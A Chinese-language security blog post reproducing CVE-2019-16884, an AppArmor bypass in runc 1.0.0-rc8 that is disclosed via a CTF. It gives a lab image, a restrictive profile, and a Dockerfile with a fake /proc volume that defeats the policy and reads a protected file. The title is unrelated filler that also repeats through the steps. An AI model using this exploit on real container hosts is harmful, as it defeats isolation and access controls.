restriction是什么意思中文(restriction是什么意思)

影响范围

runc 1.0.0-rc8

漏洞类型

容器逃逸漏洞

利用条件

影响范围应用

漏洞概述

在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制,因为libcontainer/rootfs_linux.go错误地检查装载目标,攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc,之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略,该漏洞由Adam Iwaniuk发现并在DragonSector CTF 2019期间披露,这个CTF题目挑战将一个文件挂载到/flag-<random>,并使用AppArmor策略拒绝访问该文件,选手可以利用这个漏洞来禁用这个策略并读取文件

漏洞环境

构建实验环境:

docker run -it ssst0n3/docker_archive:CVE-2019-16884
ubuntu login: rootPassword: root

漏洞复现

Step 1:创建apparmor规则

    cat > /etc/apparmor.d/no_flag <<EOF#include <tunables/global>
    profile no_flag flags=(attach_disconnected,mediate_deleted) { #include <abstractions/base> file, deny /flag r,}EOF

    restriction是什么意思中文(restriction是什么意思)

    Step 2:创建一个flag文件

    echo \\\"Al1ex is comming\\\" > /tmp/flag

    restriction是什么意思中文(restriction是什么意思)

    Step 3:应用规则

    /sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag

    restriction是什么意思中文(restriction是什么意思)

    Step 4:启动一个正常镜像此时无权限读取/flag内容

    docker run --rm --security-opt \\\"apparmor=no_flag\\\" -v /tmp/flag:/flag busybox cat /flagcat: can\\\'t open \\\'/flag\\\': Permission denied

    Step 4:利用漏洞启用一个恶意镜像,可以读取/flag

    mkdir -p rootfs/proc/self/{attr,fd}touch rootfs/proc/self/{status,attr/exec}touch rootfs/proc/self/fd/{4,5}
    cat <<EOF > DockerfileFROM busyboxADD rootfs / VOLUME /procEOF
    docker build -t apparmor-bypass . docker run --rm --security-opt \\\"apparmor=no_flag\\\" -v /tmp/flag:/flag apparmor-bypass cat /flagAl1ex is comming!!!docker: Error response from daemon: cannot start a stopped process: unknown.

    安全建议

    升级到最新版本

    原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34172.html

    (0)
    七芒星实验室's avatar七芒星实验室
    上一篇 2024年4月6日 上午6:52
    下一篇 2024年4月6日 上午6:54

    相关推荐

    • SEO排名高的网站有哪些特点?

      SEO是一项简单而又复杂的工作,说它简单,是SEO相关工作技术性很容易操作,说它复杂,是常规操作了,可排名获得却又很难。其实SEO工作说来说去都是那些,如果已经

      2024年9月21日
      0
    • 如何手动关闭445网口

      目前国内的网络运营商已关闭445端口,但高校网络为达到学术需求,通常使用教育网接入,可能未对445端口进行防护。此外开启防火墙功能,也会阻止电脑接收445端口的

      2024年9月18日
      0
    • 现在用的编程是什么

      现在流行的编程语言有多种,包括Python、JavaScript、Java、C#和Go等,每种语言都有其独特的应用场景和优势。Python 是当今广泛使用的高级编程语言。Pytho…

      网站运维 2024年5月12日
      0
    • Process Herpaderping(Mitre:T1055))

      文章前言 约翰尼·肖演示了一种被称为进程删除的防御规避技术,在这种技术中攻击者能够在对创建的进程的检查实际开始之前将恶意代码注入合法进程的映射内存段,这有助于攻击者绕过防御和权限提…

      2024年4月12日
      0

    发表回复

    您的邮箱地址不会被公开。 必填项已用 * 标注